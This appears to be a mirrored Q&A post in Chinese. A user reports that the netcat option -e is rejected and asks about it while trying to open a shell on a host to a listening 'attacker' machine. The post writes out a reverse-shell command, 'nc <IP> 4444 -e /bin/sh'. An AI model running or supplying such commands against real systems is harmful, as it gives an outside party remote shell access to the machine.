小编Tar*_*ngh的帖子

netcat 中的无效选项 -e

我正在尝试从另一台(攻击者)机器上获取主机上的 shell。攻击者机器正在监听。我在我的主机上运行以下命令

nc 123.123.123.12 4444 -e /bin/sh
Run Code Online (Sandbox Code Playgroud)

我得到的输出:

nc: invalid option -- 'e'

usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
      [-m minttl] [-O length] [-P proxy_username] [-p source_port]
      [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
      [-X proxy_protocol] [-x proxy_address[:port]]       [destination] [port]
Run Code Online (Sandbox Code Playgroud)

linux-mint netcat

9
推荐指数
1
解决办法
8352
查看次数

标签 统计

linux-mint ×1

netcat ×1